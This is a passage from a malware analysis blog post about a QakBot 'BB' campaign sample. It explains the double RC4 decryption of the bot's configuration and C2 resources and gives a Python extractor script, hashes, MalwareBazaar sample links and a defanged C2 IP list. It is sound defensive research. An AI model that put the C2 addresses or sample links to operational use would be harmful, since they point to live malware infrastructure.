<strong>tiddler.dat</strong>, following some details of the DLL.</p> <p><img src="/assets/images/2022-10-13-qakbot-bb-extractor/img5.png" alt="Screenshot" /> <em><center>Figure 5 - tiddler.dat details </center></em></p> <p><strong>Tiddler.dat</strong> is the first stage DLL used to extract the unpacked version of the malware, by setting a breakpoint on <strong>NtAllocateVirtualMemory</strong> it’s easy to find the unpacked version, I’ll not describe how to get it.</p> <p>After unpacking the DLL, we can analyse it, the details are in the image below.</p> <p><img src="/assets/images/2022-10-13-qakbot-bb-extractor/img6.png" alt="Screenshot" /> <em><center>Figure 6 - Unpacked DLL details</center></em></p> <p>After some analysis we can confirm that the malware is <strong>QAKBOT</strong>, the malware seems to be similar to the one reported by several blog post, anyway the <strong>BOT Configuration</strong> and the <strong>C2 IPs</strong> list are encrypted in a different way, so I’ll only describe how to decrypt it instead of write something already reported in a very clear way by several blog posts:</p> <ul> <li><a href="https://www.elastic.co/security-labs/qbot-malware-analysis">Elastic</a></li> <li><a href="https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/?_adin=02021864894">Hornetsecurity</a></li> </ul> <p>You can find all the decrypted strings and the scripts in my <a href="https://github.com/Syrion89/Qakbot-2022.09.30">GitHub</a>.</p> <p>The file has two resources, one containing the encrypted <strong>Configuration</strong> and one containing the encrypted <strong>C2 IPs list</strong>.</p> <p><img src="/assets/images/2022-10-13-qakbot-bb-extractor/img7.png" alt="Screenshot" /> <em><center>Figure 7 - Resouce 3C91E639 containing the C2 list</center></em></p> <p><img src="/assets/images/2022-10-13-qakbot-bb-extractor/img8.png" alt="Screenshot" /> <em><center>Figure 8 - Resource 89210AF9 containing the bot configuration</center></em></p> <p>The resources are encrypted in the same way, so let’s use the configuration resource as example.</p> <p>Two “steps” of <strong>RC4 encryption</strong> are used, let’ see it on <a href="https://gchq.github.io/CyberChef/">CyberChef</a> in order to be clearer.</p> <p>As shown in the image below, in the first step, the <strong>SHA1 Hash</strong> is calculated on the string, “<strong>Muhcu#YgcdXubYBu2@2ub4fbUhuiNhyVtcd</strong>”, the SHA1 Hash result is “<strong>CA 6A E9 55 26 F0 BC EB 6B A5 39 0E B6 14 81 9A 9B 4A F9 4E</strong>”, this will be the <strong>RC4 key</strong> (the string used is different in each qakbot sample, for example in another sample I analyzed it was “<strong>bUdiuy81gYguty@4frdRdpfko(eKmudeuMncueaN</strong>”, you have to figure out which string it uses).</p> <p><img src="/assets/images/2022-10-13-qakbot-bb-extractor/img9.png" alt="Screenshot" /> <em><center>Figure 9 - SHA1 Hash of the string "Muhcu#YgcdXubYBu2@2ub4fbUhuiNhyVtcd"</center></em></p> <p>Using the data we obtain from <strong>SHA1</strong> as key, we can use the <strong>RC4 algorithm</strong> to decrypt the data. The output from the first <strong>RC4 decryption</strong> will contains the following data:</p> <ul> <li>From bytes 0 to 20: <strong>SHA1 Hash of New Key + Encrypted Configuration</strong></li> <li>From bytes 20 to 40: <strong>New Key</strong></li> <li>From bytes 40 to end: <strong>Encrypted Configuration</strong></li> </ul> <p><img src="/assets/images/2022-10-13-qakbot-bb-extractor/img10.png" alt="Screenshot" /> <em><center>Figure 10 - Resource RC4 Decryption Step 1</center></em></p> <p>In the image below we can see that the <strong>SHA1 Hash</strong> of <strong>New Key</strong> + <strong>Encrypted Configuration</strong> matches the first 20 bytes we got from the decrypted data.</p> <p><img src="/assets/images/2022-10-13-qakbot-bb-extractor/img11.png" alt="Screenshot" /> <em><center>Figure 11 - SHA1(Encrypted Configuration)</center></em></p> <p>In the second step, the <strong>RC4</strong> algorithm is used with the <strong>New Key</strong> to decrypt the <strong>Encrypted Configuration</strong>. The following images shows the result of the second step decryption.</p> <p><img src="/assets/images/2022-10-13-qakbot-bb-extractor/img12.png" alt="Screenshot" /> <em><center>Figure 12 - Resource RC4 Decryption Step 2</center></em></p> <p>The QAKBOT campaign ID is “<strong>BB</strong>” the timestamp <strong>1664535088</strong> corresponds to <strong>Fri Sep 30 2022 10:51:28 GMT+0000</strong>.</p> <p>While writing this, a <a href="https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html">blog post</a> by Trendmicro was published talking about this specific QAKBOT campaign.</p> <p>To automatically extract the configuration and the C2 IPs, I wrote the following python script.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import hashlib from arc4 import ARC4 file = open("89210AF9.bin","rb") #Resource with Qakbot configuration resource = file.read() key = hashlib.sha1(b"Muhcu#YgcdXubYBu2@2ub4fbUhuiNhyVtcd").digest() #change with your password rc4 = ARC4(key) data = rc4.decrypt(resource) key = data[20:40] rc4 = ARC4(key) decrypted_data = rc4.decrypt(data[40:]) print("Qakbot Configuration:") print((decrypted_data[20:]).decode("utf-8")) file = open("3C91E639.bin","rb") #Resource with Qakbot C2 resource = file.read() key = hashlib.sha1(b"Muhcu#YgcdXubYBu2@2ub4fbUhuiNhyVtcd").digest() #change with your password rc4 = ARC4(key) data = rc4.decrypt(resource) key = data[20:40] rc4 = ARC4(key) #print(key) decrypted_data = rc4.decrypt(data[40:]) print("Qakbot C2:") for i in range(21,len(decrypted_data),7): c2 = bytearray(decrypted_data[i:i+7]) print("%d.%d.%d.%d:%d" % (c2[0],c2[1],c2[2],c2[3],(c2[4]&lt;&lt;8)+c2[5])) </code></pre></div></div> <p>Hope this first malware blog post can help someone during his analysis of QAKBOT, you can find the samples at the following urls:</p> <ul> <li><a href="https://bazaar.abuse.ch/sample/5b54f57dbaa74fa589afb2d26d6c6b39e0c2930bd88fea3172556ce96b3eb959/">https://bazaar.abuse.ch/sample/5b54f57dbaa74fa589afb2d26d6c6b39e0c2930bd88fea3172556ce96b3eb959/</a></li> <li><a href="https://bazaar.abuse.ch/sample/8b08c031d365a0b4d032c6e51bf773655e15795fe3eabcd3fa6487ffe9f3d6b3/">https://bazaar.abuse.ch/sample/8b08c031d365a0b4d032c6e51bf773655e15795fe3eabcd3fa6487ffe9f3d6b3/</a></li> <li><a href="https://bazaar.abuse.ch/sample/796ff26db045085ec8162d414cc2deafb2836d3f0bffd8c58af4595ebb4261e9/">https://bazaar.abuse.ch/sample/796ff26db045085ec8162d414cc2deafb2836d3f0bffd8c58af4595ebb4261e9/</a></li> </ul> <p><strong>Configuration:</strong></p> <ul> <li>10=BB</li> <li>3=1664535088</li> </ul> <p><strong>File Hashes:</strong></p> <ul> <li>5B54F57DBAA74FA589AFB2D26D6C6B39E0C2930BD88FEA3172556CE96B3EB959</li> <li>796FF26DB045085EC8162D414CC2DEAFB2836D3F0BFFD8C58AF4595EBB4261E9</li> <li>D5F09EBC9B1F3FB9781ACA09E3B9FA63F90B909CC7418FF7D2AFA462F400DCE3</li> <li>8B08C031D365A0B4D032C6E51BF773655E15795FE3EABCD3FA6487FFE9F3D6B3</li> <li>93104C4834A27E39C13AC9D4663C6FA622AE6ECC5491A67DDF9125E6633CF07B</li> <li>55AD915DCD65192548046ECBECDA5AD8AD6A92A11F07EC9A92744FCAC1599501</li> <li>757D3C81555FBF635B2B9FD1D5222E6FE046710753395545A29E3E1F0A78FBF1</li> <li>BD3A47E0E27523044FEB2C30879EB684CFD174EC329350BAF5E0824FFFF1A22F</li> </ul> <p><strong>C2 IPs:</strong></p> <ul> <li>41.107.71[.]201:443</li> <li>105.101.230[.]16:443</li> <li>105.108.239[.]60:443</li> <li>196.64.227[.]5:8443</li> <li>41.249.158[.]221:995</li> <li>134.35.14[.]5:443</li> <li>113.170.117[.]251:443</li> <li>187.193.219[.]248:443</li> <li>122.166.244[.]116:443</li> <li>154.237.129[.]123:995</li> <li>41.98.229[.]81:443</li> <li>186.48.199[.]243:995</li> <li>102.156.3[.]13:443</li> <li>41.97.190[.]189:443</li> <li>197.207.191[.]164:443</li> <li>105.184.14[.]132:995</li> <li>196.207.146[.]151:443</li> <li>105.158.113[.]15:443</li> <li>196.89.42[.]89:995</li> <li>86.98.156[.]229:993</li> <li>177.174.119[.]195:32101</li> <li>81.156.194[.]147:2078</li> <li>80.253.189[.]55:443</li> <li>197.49.175[.]67:995</li> <li>177.45.78[.]52:993</li> <li>89.187.169[.]77:443</li> <li>196.92.59[.]242:995</li> <li>41.13.200[.]19:443</li> <li>41.97.195[.]237:443</li> <li>92.191.56[.]11:2222</li> <li>154.70.53[.]202:443</li> <li>210.186.37[.]98:50002</li> </ul> Thu, 13 Oct 2022 00:00:00 +0200 https://syrion.me/qakbot-bb-extractor/ https://syrion.me/qakbot-bb-extractor/ Malware